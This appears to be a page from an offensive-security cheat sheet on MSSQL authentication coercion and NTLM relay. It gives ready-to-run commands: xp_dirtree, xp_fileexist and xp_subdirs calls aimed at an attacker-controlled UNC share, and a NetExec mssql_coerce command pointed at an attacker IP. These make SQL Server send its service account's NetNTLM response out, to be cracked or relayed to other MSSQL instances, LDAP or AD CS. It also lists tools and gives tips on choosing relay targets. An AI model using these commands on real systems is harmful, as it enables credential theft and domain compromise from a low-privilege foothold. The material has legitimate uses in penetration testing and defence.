MSSQL coercion and relay

SQL Server will reach out to a UNC path on command, and any public login can usually make it do so through xp_dirtree or xp_fileexist. Point that path at an attacker listener and the instance authenticates with its service account over SMB, handing you a NetNTLM response to capture and crack or, far better, to relay. This turns a low-privilege database session into movement across instances or into the domain, without any sysadmin right.

Triggering the outbound authentication#

sql
-- any public login can usually call these; the UNC target is attacker-controlled
EXEC xp_dirtree '\\<attacker>\share', 1, 1;
EXEC xp_fileexist '\\<attacker>\share\x';
EXEC master.dbo.xp_subdirs '\\<attacker>\share';
bash
# NetExec coerces the authentication for you
nxc mssql <target> -u user -p pass -M mssql_coerce -o LISTENER=<attacker-ip>

What to do with the coerced authentication#

  • Relay to another MSSQL where the service account is privileged: relaying the service account's connection to a second instance can promote you to sysadmin there.
  • Relay to LDAP / AD CS: the MSSQL service often runs as a domain account, so its coerced authentication feeds RBCD, shadow credentials, or a certificate exactly like any other coerced domain authentication.
  • Capture and crack the NetNTLM where the service account password is weak.

Exploitation notes#

  • The coercion needs only public, so it works from the lowest foothold and before any escalation inside the engine.
  • The value depends on the service account: a domain service account makes this an Active Directory relay primitive, not just a database trick.
  • ntlmrelayx supports relaying to MSSQL targets directly, so an MSSQL-to-MSSQL relay is a self-contained privilege escalation across instances.
  • Combine with enumeration to pick a relay target where the coerced account is sysadmin.

Tools#

  • NetExec mssql (-M mssql_coerce): trigger the outbound authentication.
  • Impacket mssqlclient.py: call xp_dirtree/xp_fileexist interactively.
  • ntlmrelayx.py: relay the coerced service-account authentication to MSSQL, LDAP, or AD CS.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more